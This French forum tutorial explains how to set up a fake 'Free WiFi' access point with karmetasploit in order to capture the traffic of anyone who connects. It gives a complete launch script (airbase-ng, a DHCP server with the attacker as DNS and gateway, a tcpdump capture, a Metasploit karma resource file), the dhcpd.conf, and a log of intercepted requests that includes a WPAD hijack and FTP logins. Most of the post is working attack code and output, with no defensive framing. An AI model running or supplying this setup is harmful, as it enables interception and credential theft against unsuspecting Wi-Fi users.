Annonce

Réduire
Aucune annonce.

Fake AP avec karmetasploit

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel Fake AP avec karmetasploit

    Nous allons voir ici comment créer un faux AP afin de récupérer les données transitant par notre pc, une fois que quelqu'un s'y est connecté.

    Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack.

    voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm.

    +--------+ +--------+ +-------------+
    | router +----rj45-----+ NB BT3 +-----------+ AP Alfa 500 +
    +--------+ +--------+ +---+---------+
    /|\
    *
    connection
    *
    |
    +--------+ +-----------------+
    + NB XP +-------------+ Wifi Wus54gc +
    +--------+ +-----------------+

    1) création du script qui va lancer karmetasploit


    Code:
    bt Desktop # kedit karmetasploit.sh
    contenu

    Code:
    #!/bin/bash
    
    killall -9 dhcpd tcpdump airbase-ng
    
    airmon-ng start wlan0
    modprobe tun
    
    airbase-ng -P -C 30 -c 7 -e "Free WiFi" -v wlan0 >/dev/null 2>&1 &
    sleep 2
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    sleep 2
    echo > /var/state/dhcp/dhcpd.leases
    dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
    sleep 2
    ifconfig at0 mtu 1800
    tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
    /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

    Ne pas oublier de le rendre exécutable



    Code:
    bt Desktop # chmod +x karmetasploit.sh
    Télécharger le ici : http://backtrack-fr.net/test/karma/karmetasploit.sh

    2) création du fichier dhcpd.conf


    Code:
    bt Desktop # kedit /pentest/exploits/framework3/dhcpd.conf
    contenu

    Code:
    option domain-name-servers 10.0.0.1;
    
    default-lease-time 60;
    max-lease-time 72;
    
    ddns-update-style none;
    
    authoritative;
    
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
    }
    Télécharger le ici : http://backtrack-fr.net/test/karma/dhcpd.conf

    3) Voila il ne nous reste plus qu'à lancer notre script


    Code:
    bt Desktop # ./karmetasploit.sh


    les modules se loadent et le server démarre



    4) on vérifie si notre fake AP est visible



    5) Depuis notre poste windows, on lance notre wifi manager



    6) et on se connecte sur le free WIFI ::



    7) Regardons si on reçoit quelque chose sur notre server



    8) Tout ce qui transite par notre machine est capturé est sauvegardé dans un fichier que nous pourrons exploiter.
    Nous allons donc ouvir le fichier "/pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap" avec wireshark.



    On constate que c'est bel et bien ce que l'on avait sur notre écran



    Code:
    [*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] DNS 10.0.0.254:49836 XID 42755 (IN::A wpad)[*] HTTP wpad.dat sent to 10.0.0.254[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=[*] DNS 10.0.0.254:62629 XID 21450 (IN::A www.symantec.com)[*] DNS 10.0.0.254:57988 XID 17388 (IN::A liveupdate.symantecliveupdate.com)[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /minitri.flg Unknown   cookies=[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /livetri.zip Unknown   cookies=[*] DNS 10.0.0.254:51388 XID 59332 (IN::A liveupdate.symantec.com)[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /minitri.flg Unknown   cookies=[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /livetri.zip Unknown   cookies=[*] DNS 10.0.0.254:65278 XID 60765 (IN::A update.symantec.com)[*] FTP LOGIN 10.0.0.254:1107 cust-r2 / xxxxxxx[*] FTP LOGIN 10.0.0.254:1108 cust-r2 / xxxxxxx
    Source : forum.backtrack-fr.net
    mactux †|

    Le savoir n'est réel que s'il est partagé
Chargement...
X